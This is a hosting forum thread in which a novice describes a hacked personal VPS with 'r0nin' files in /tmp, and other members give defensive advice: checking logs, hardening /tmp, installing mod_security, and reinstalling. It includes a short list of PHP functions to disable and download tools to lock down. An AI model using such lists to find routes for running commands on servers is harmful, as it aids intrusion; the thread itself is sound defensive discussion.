Results 1 to 20 of 20
  1. #1
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540

    [Hacked] Now what?

    Ok, just had a personal VPS hacked, which in a way is a good thing. This VPS is strictly for me to learn linux and security, and hosts a few of my personal sites.

    Now, this isn't the first time its happened, but last time I just deleted phpbb, cleaned up /tmp and chmod 1777 it.

    But now, r0nin has appeared, I dont believe they have root, since I have su - set up and it emails me when root logs in.

    So, in /tmp there is the r0nin file, a folder called sql(left over from last time, although inactive)it contains a .htm a .txt and a php mailer. Not too worried about these as I have practised securing this vps, and my mail queue is still empty.

    So, the question is how do I find out who owns the files, where do I look to see how they did it, and by which domain? After I have found these things out I will be mounting /tmp noexec, nosuid etc


    Thanks, Philip
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  2. #2
    Join Date
    Sep 2005
    Location
    Essex, England
    Posts
    548
    The bash command history will come in handy in your case, I think.

  3. #3
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    ls -alh /tmp
    will show the owner, it is probably nobody. Look at the apache logs to find out where it came from, they may have something.

    Nonexec/nosuid will not help against and perl programs but it will help with binary programs. Bash history probably will show nothing since they were most likely put in via a php injection.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  4. #4
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Yep, its nobody all right, just going to delete now, chmod again and rid wget.

    Just got rid of old version of IPB too, which i suspect was the culprit.
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  5. #5
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    sometimes they use curl to download files too, there are a lot of possibilities to getting files on a system.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  6. #6
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Thanks, need all the info I can. Only been doing this for about a month, never touched linux before hand, but i want to be able to get servers running myself at one point, rather than wait for my admin to get outta bed
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  7. #7
    Join Date
    Dec 2002
    Location
    chica go go
    Posts
    11,876
    Chmod wget, curl, lynx, ftp, etc to 700. I also recommend you install mod_security for apache.

  8. #8
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    I have mod security inctalled, but could not install a ruleset because it would break all images on the vps
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  9. #9
    Join Date
    Jul 2001
    Location
    Singapore
    Posts
    1,889
    Why delete those files in /tmp? For me, I would rather chmod it to 000, owned by root and chattr them so that if the same exploit from the same person or using the same method which trying to write/create the same filenames/directories won't be able to due to it is there already... ...

    Just my thoughts

  10. #10
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Darn, I deleted them 20 seconds before reading this

    But thanks anyway, thats what this threads for, information
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  11. #11
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Well, i went back into top, saw a few more processes than usual so I checked /tmp and guess what, its back! How the jiggy did that happen?

    Which logs do i need to check?
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  12. #12
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    You are probably getting exploited by the same exploit over and over. I cannot remember if ronin was one that needed a reboot. I would suggest installing mod_security and disabling uneeded php functions. Now go in and delete all the r0nin stuff and kill the processes.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  13. #13
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    I've disabled exec, shell_exec, passthru, popen and system. There is nothing exploitable on the server anymore, i removed ipb and phpbb before deleting the last r0nin file.

    Where do I pu the mod_security rules, last time I added them to httpd.conf(i think it was) images/css on the server stopped loading.

    Thanks, Philip
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  14. #14
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    Originally posted by Philipf
    I've disabled exec, shell_exec, passthru, popen and system. There is nothing exploitable on the server anymore, i removed ipb and phpbb before deleting the last r0nin file.

    Where do I pu the mod_security rules, last time I added them to httpd.conf(i think it was) images/css on the server stopped loading.

    Thanks, Philip
    Yes that is how you should do it. Check the audit log to see if mod_sec is the cause of the image/css problem /usr/local/apache/logs/audit_log The ruleset you are using may be too sensitive or in some way causing other trouble.

    Also make sure you put the mod_sec rules below addmodule/loadmodule part but not in some If section (like something controlling image types).
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  15. #15
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Ok, another problem now, Im trying to secure tmp properly, using:

    dd if=/dev/zero of=tmpMnt bs=1024 count=100000
    mke2fs /dev/tmpMnt
    mount -o loop,noexec,nosuid,rw /dev/tmpMnt /var/tmp
    chmod 0777 /var/tmp
    ln -s /var/tmp /tmp

    Add this to your fstab
    /dev/tmpMnt /var/tmp ext2 loop,noexec,nosuid,rw 0 0


    But when i type mke2fs, it says command not found, so I

    'locate mke2fs'

    And nothing happened, so I switched it to 'locate mkfs' and it finds it, but if i use it to make /dev/tmpmnt it says file or folder not found.

    Any ideas?
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  16. #16
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    Try:

    mkfs.ext2


    instead
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  17. #17
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Gives the same error

    Tried with the path(/sbin) too but no luck, it just says mkfs.ext2: No such file or directory.
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  18. #18
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    Originally posted by Philipf
    Gives the same error

    Tried with the path(/sbin) too but no luck, it just says mkfs.ext2: No such file or directory.
    Ok well install the e2fsprogs rpm then and that should give you the tools
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  19. #19
    What I suggest you is to recompile apache with phpsuexec enabled(you can do this with /scripts/easyapache), so apache runs in user mode rather than as nobody. So you can easily track the user , by checking the file ownership.

  20. #20
    Join Date
    Nov 2002
    Location
    Bay Area, California
    Posts
    309
    Hello,

    I think it's great that you are learning linux

    But I would say that cleaning a hacked box is an undesirable thing to do. We have a lot of years of experience here, but we still prefer to reinstall if we suspect a compromise.

    The best setup for a linux box, imho, is to start on your console by turning basically everything off. Then use iptables or some such to block all traffic to the box except your own.

    Then you start thinking about your services, one at a time. Look at what your os provides for that service and do research. See if there are other well known packages you might consider using for providing that service.

    Read about previous security problems with each package you might use to provide the service. Look for open bug reports. Look at how active the community is in responding to bug reports on each package. See if the package has a mailing list for security announcements, and for discussing issues with other users.

    Consider the code. Is it in a language you can at least read? Do you feel that if you wanted to disable a feature that had been found to be insecure you might be able to do it yourself even before a patch was announced. Does the package provide useful levels of logging in order to let you monitor (programatically) the use of the service? Do the configuration options provided by the authors look like they were considering security when they wrote it?

    When you find a package you like, plan for it to be compromised and install it in a way so that even if it is compromised, an intruder will learn little or nothing, and will not gain access to other services or resources. This means use separate machines, or ip addresses, or usernames, or disk partitions, or directories, or whatever, in order to isolate this service from every other part of your system.

    Then configure logging. One of the most useful things you can learn to do as a linux administrator is to write small scripts which monitor your logs. Tell your script to ignore types of lines you expect to see, and have them act, or notify you, when they see lines you don't expect to see.

    Have your scripts watch the amount of use the service is getting, so you know when you have an unusual amount of usage. Have them monitor the amount of system resources the service is using so you know if it is are beginning to impact other services.

    Configure iptables, or whatever, to allow traffic to reach this newly configured service. Expect that some approaches to the service will be unwanted and build a banlist for the service from the very outset.

    Ideally those watcher scripts you are learning to make will be able to add ips to the banlist, and control the rate of requests for service that are permitted to pass the firewall.

    omg, i must stop typing But all this is stuff you do before you even turn the service on!

    Luxore
    Sunwave Communications
    http://www.sunwave.com/
    Safety - Service - Economy

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •